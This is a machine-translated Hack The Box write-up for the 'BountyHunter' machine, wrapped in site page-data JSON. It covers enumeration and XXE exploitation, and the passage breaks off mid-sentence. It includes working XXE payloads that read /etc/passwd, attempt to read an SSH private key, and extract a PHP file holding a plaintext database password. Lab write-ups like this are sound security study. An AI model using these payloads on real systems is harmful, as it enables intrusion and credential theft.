{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-bugbountyhunter-en","result":{"data":{"markdownRemark":{"id":"1fe8f077-71ef-5968-9b4d-0a5f5a9075a7","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-bugbountyhunter\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<img src=\"http://www.hackthebox.eu/badge/image/327080\" alt=\"Hack The Box\">\n<p>This is a writeup for the retired HackTheBox machine “BountyHunter.”</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/0b533/image-11.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAARlAAAEZQAGA43XUAAAC80lEQVQ4y21TW0tUURidJy1Lx7k4l3Obc937nDnnzN1Ry9RUrHzwISSNICGIxC4zZDovGhQECiIUBlIvRX8j6Kf0I/oBq2+fcUzNh4/znc3ea69vrbVjiTzHcI5BfM9WtCZxDI0wXEs4SGkcBZPDcl2odhGaFUDWA0gFH1nNg2ZzeH4JsUSe0WEBwv4DG0wxSF4Rdx7XsPS0hkqzCNVgUDwBEBJgGIHmTA+KQ4COKwDPMzxllqaDvo+jb6M43F9Bp7WI4+MqGjcDKAViy0uQialMTCXDhW0xcLrsUoYpAuxLMqysVvHnnYPPHxfR2prE746JF2tVKGJ814fEXeRsFxoBcpKD00WXAiYJsJ8AH63V8GvzLnb2F/DlxxJ+Hi1hY30MWZVGZEXkaMyc5RJTDxL1ssnPj9z7JmXSL+nAHg/w4esy3h88xPeDB9jbm0NtoYZ0jgDdIrI2Q4H5sL0SdB6QDME/hj2weNaJKiW7kY7BZICVzXGsthuoz5YhF8LIWZWFMIplAqOi3mIlWE54nqEAyhYCqhD9cQ0DKR1X4xYGkiY5GyJDl6iklxg5LTuQaWyDh6Shh7zqQtJOXBYsBaO+uIq5e8s4/HSMJ8/aUbW3drHxqoPt3bdYf/0Sz1stvOnsoL3dQTh6C3kyQjeLyEg2ZBEbwa47MkUl40AyK6iOzUdVbs7Br01hav4+THcClYkZ1Ken0ZyZRfP2LBSRRTJEdSg+zEWe+phwNK2ykyK2so3rGZ2qgMFsAVfiJvS6BOeGgv4hE8OygbRuImNZJAOH6pHL9HpyZjchMRHilMLI2W6lFHGBixFRpEmCHNXLNoyqFfUj9MxSinu6L+plHv0L6WI9MzJaSGaUon44y+gF1GF4ExTgJuIZcnyEcmZXobkNpBWf5LGRNyq0Z5zi0qTzpcjcU0CdN2B6zdPYKHQ4bMzA9sdpoxNpnNZsaKFxJrcOnGACVnEsOtMd+UL+eq8lTuuCxb+1rnnxLMfFqPX2iLW/rJS60yP3hHcAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/8ac56/image-11.webp 240w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/d3be9/image-11.webp 480w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/b0a15/image-11.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 500px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/8ff5a/image-11.png 240w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/e85cb/image-11.png 480w,\n/static/4d74412dfc7fdf1fe92e7b15531b03fb/0b533/image-11.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4d74412dfc7fdf1fe92e7b15531b03fb/0b533/image-11.png\"\n            alt=\"image-11.png\"\n            title=\"image-11.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#xxe-xml-external-entity\">XXE (XML External Entity)</a></p>\n<ul>\n<li><a href=\"#dtd\">DTD</a></li>\n</ul>\n</li>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#exploiting-xxe\">Exploiting XXE</a></li>\n<li>\n<p><a href=\"#privilege-escalation\">Privilege Escalation</a></p>\n<ul>\n<li><a href=\"#ticketvalidatorpy\">ticketValidator.py</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"xxe-xml-external-entity\" style=\"position:relative;\"><a href=\"#xxe-xml-external-entity\" aria-label=\"xxe xml external entity permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>XXE (XML External Entity)</h2>\n<p>Before going through the flag-capturing procedure, let me summarize the XXE technique used first.</p>\n<p>XXE stands for XML External Entity, and is a vulnerability that exploits external entity references in XML.</p>\n<p>By abusing XXE, an attacker can retrieve files from the server, gather information, and perform SSRF attacks, among other things.</p>\n<p>Reference: <a href=\"https://www.mbsd.jp/blog/20171130.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">XXE Attack Basics | MBSD Blog</a></p>\n<p>Reference: <a href=\"https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">XML External Entity (XXE) Processing | OWASP</a></p>\n<p>Reference: <a href=\"https://amzn.to/3cKRReL\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">The Web Application Hacker’s Handbook (2nd edition)</a></p>\n<h3 id=\"dtd\" style=\"position:relative;\"><a href=\"#dtd\" aria-label=\"dtd permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>DTD</h3>\n<p>DTD stands for Document Type Definition and is used to define the schema of an XML document structure.</p>\n<p>Using <code class=\"language-text\">&lt;!ENTITY</code>, you can call entity references to perform string substitution or embed the contents of external files.</p>\n<p>Reference: <a href=\"https://atmarkit.itmedia.co.jp/aig/01xml/dtd.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">XML Glossary [DTD (Document Type Definition)]</a></p>\n<p>Reference: <a href=\"https://ja.wikipedia.org/wiki/Document_Type_Definition\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Document Type Definition - Wikipedia</a></p>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>First, I run nmap.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Starting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2021</span>-11-25 <span class=\"token number\">18</span>:26 JST\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.11.100<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.54s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">998</span> closed tcp ports <span class=\"token punctuation\">(</span>conn-refused<span class=\"token punctuation\">)</span>\nPORT   STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">8</span>.2p1 Ubuntu 4ubuntu0.2 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">3072</span> d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.41 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Ubuntu<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Bounty Hunters\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.41 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">178.60</span> seconds</code></pre></div>\n<p>Port 80 is open, so I access the web interface and find the following form:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b7aeade27c357723437385e55a8a6a33/0b533/image-12.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 42.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAARlAAAEZQAGA43XUAAAA2UlEQVQoz6WQaQtEUBSG/f//JMr4oAjZxohQCmlsg8gy71zNmtHUPB9up9N57lmovu8FQbAsS9d113VN05Rl+Ug4EZCUJCnLsjAMUYkMlIVAIeJ5/kBAkaZpHMfRNK2qqm3boigqisIwjOd5vu+zLAu/bVuY8zxTyztIjeM4DMM0TYiXXW7ydAdxHMdogiGLomia5kKoqmr961H2lF+B7DhOFEVJksA/E/I835ziU07TNAgCrIf+uFBZluhf1/VPMhbGYHgNw8Cpuq5b9/q68ybrevs3o5Y/uAJhSAFDJhazjgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b7aeade27c357723437385e55a8a6a33/8ac56/image-12.webp 240w,\n/static/b7aeade27c357723437385e55a8a6a33/d3be9/image-12.webp 480w,\n/static/b7aeade27c357723437385e55a8a6a33/b0a15/image-12.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 500px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b7aeade27c357723437385e55a8a6a33/8ff5a/image-12.png 240w,\n/static/b7aeade27c357723437385e55a8a6a33/e85cb/image-12.png 480w,\n/static/b7aeade27c357723437385e55a8a6a33/0b533/image-12.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b7aeade27c357723437385e55a8a6a33/0b533/image-12.png\"\n            alt=\"image-12.png\"\n            title=\"image-12.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I also run feroxbuster to scan for directories.</p>\n<p>The backend appears to be PHP, so I specify PHP in the options.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">feroxbuster -u http://<span class=\"token variable\">$RHOST</span>/ -x php -w /usr/share/wordlists/raft-medium-directories.txt --no-recursion <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> feroxbuster.txt\n\n<span class=\"token number\">301</span>        9l       28w      313c http://<span class=\"token variable\">$RHOST</span>/js\n<span class=\"token number\">301</span>        9l       28w      314c http://<span class=\"token variable\">$RHOST</span>/css\n<span class=\"token number\">301</span>        9l       28w      317c http://<span class=\"token variable\">$RHOST</span>/assets\n<span class=\"token number\">200</span>        0l        0w        0c http://<span class=\"token variable\">$RHOST</span>/db.php\n<span class=\"token number\">301</span>        9l       28w      320c http://<span class=\"token variable\">$RHOST</span>/resources\n<span class=\"token number\">200</span>      388l     1470w        0c http://<span class=\"token variable\">$RHOST</span>/index.php\n<span class=\"token number\">200</span>        5l       15w      125c http://<span class=\"token variable\">$RHOST</span>/portal.php</code></pre></div>\n<p>Looking at the form’s script, it constructs an XML string from each input value, Base64-encodes it, and POST-submits it to <code class=\"language-text\">/tracker_diRbPr00f314.php</code>. (The string that’s actually sent seems to be further transformed from the Base64, though I couldn’t fully understand where or how.)</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">function</span> <span class=\"token function\">returnSecret</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">data</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">return</span> Promise<span class=\"token punctuation\">.</span><span class=\"token function\">resolve</span><span class=\"token punctuation\">(</span>$<span class=\"token punctuation\">.</span><span class=\"token function\">ajax</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span>\n            <span class=\"token literal-property property\">type</span><span class=\"token operator\">:</span> <span class=\"token string\">\"POST\"</span><span class=\"token punctuation\">,</span>\n            <span class=\"token literal-property property\">data</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">{</span><span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span>data<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n            <span class=\"token literal-property property\">url</span><span class=\"token operator\">:</span> <span class=\"token string\">\"tracker_diRbPr00f314.php\"</span>\n            <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">async</span> <span class=\"token keyword\">function</span> <span class=\"token function\">bountySubmit</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">try</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">var</span> xml <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">&lt;?xml  version=\"1.0\" encoding=\"ISO-8859-1\"?>\n&lt;bugreport>\n&lt;title></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#exploitTitle'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/title>\n&lt;cwe></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cwe'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cwe>\n&lt;cvss></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cvss'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cvss>\n&lt;reward></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#reward'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/reward>\n&lt;/bugreport></span><span class=\"token template-punctuation string\">`</span></span>\n<span class=\"token keyword\">let</span> data <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> <span class=\"token function\">returnSecret</span><span class=\"token punctuation\">(</span><span class=\"token function\">btoa</span><span class=\"token punctuation\">(</span>xml<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"#return\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">html</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token keyword\">catch</span><span class=\"token punctuation\">(</span>error<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\nconsole<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">'Error:'</span><span class=\"token punctuation\">,</span> error<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>XXE looks applicable here, so I’ll try various approaches next.</p>\n<h2 id=\"exploiting-xxe\" style=\"position:relative;\"><a href=\"#exploiting-xxe\" aria-label=\"exploiting xxe permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploiting XXE</h2>\n<p>I modify the script in the browser console as follows and submit the form.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">async</span> <span class=\"token keyword\">function</span> <span class=\"token function\">bountySubmit</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">try</span> <span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">var</span> xml <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">&lt;?xml  version=\"1.0\" encoding=\"ISO-8859-1\"?>\n&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=/etc/passwd\">] > \n&lt;bugreport>\n&lt;title>&amp;xxe;&lt;/title>\n&lt;cwe></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cwe'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cwe>\n&lt;cvss></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#cvss'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/cvss>\n&lt;reward></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span><span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">'#reward'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">val</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/reward>\n&lt;/bugreport></span><span class=\"token template-punctuation string\">`</span></span>\n<span class=\"token keyword\">let</span> data <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> <span class=\"token function\">returnSecret</span><span class=\"token punctuation\">(</span><span class=\"token function\">btoa</span><span class=\"token punctuation\">(</span>xml<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">$</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"#return\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">html</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token keyword\">catch</span><span class=\"token punctuation\">(</span>error<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\nconsole<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">'Error:'</span><span class=\"token punctuation\">,</span> error<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>This returns the Base64-encoded <code class=\"language-text\">passwd</code> in the <code class=\"language-text\">title</code> element.</p>\n<p>Looking at the regular user names, I found <code class=\"language-text\">development</code>, so I tried the following XXE payloads to retrieve the user flag or SSH private key — but unfortunately they all failed.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">&lt;</span><span class=\"token operator\">!</span>DOCTYPE foo <span class=\"token punctuation\">[</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">!</span>ENTITY xxe SYSTEM <span class=\"token string\">\"php://filter/convert.base64-encode/resource=/home/development/user.txt\"</span><span class=\"token operator\">></span><span class=\"token punctuation\">]</span> <span class=\"token operator\">></span>\n<span class=\"token operator\">&lt;</span><span class=\"token operator\">!</span>DOCTYPE foo <span class=\"token punctuation\">[</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">!</span>ENTITY xxe SYSTEM <span class=\"token string\">\"php://filter/convert.base64-encode/resource=/home/development/Desktop/user.txt\"</span><span class=\"token operator\">></span><span class=\"token punctuation\">]</span> <span class=\"token operator\">></span>\n<span class=\"token operator\">&lt;</span><span class=\"token operator\">!</span>DOCTYPE foo <span class=\"token punctuation\">[</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">!</span>ENTITY xxe SYSTEM <span class=\"token string\">\"php://filter/convert.base64-encode/resource=/home/development/.ssh/id_rsa\"</span><span class=\"token operator\">></span><span class=\"token punctuation\">]</span> <span class=\"token operator\">></span></code></pre></div>\n<p>So I decided to retrieve other files running on the server.</p>\n<p>From the earlier feroxbuster results, <code class=\"language-text\">db.php</code> looked suspicious.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"># &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=db.php\">]\n\n<span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n<span class=\"token comment\">// TODO -> Implement login system with the database.</span>\n<span class=\"token variable\">$dbserver</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"localhost\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$dbname</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"bounty\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$dbusername</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"admin\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$dbpassword</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"m19RoAU0hP41A1sTsq6K\"</span><span class=\"token punctuation\">;</span>\n<span class=\"token variable\">$testuser</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"test\"</span><span class=\"token punctuation\">;</span></span></code></pre></div>\n<p>This is what was actually retrieved.</p>\n<p>Database credentials are hardcoded in plaintext.</p>\n<p>I couldn’t find a database access endpoint, so 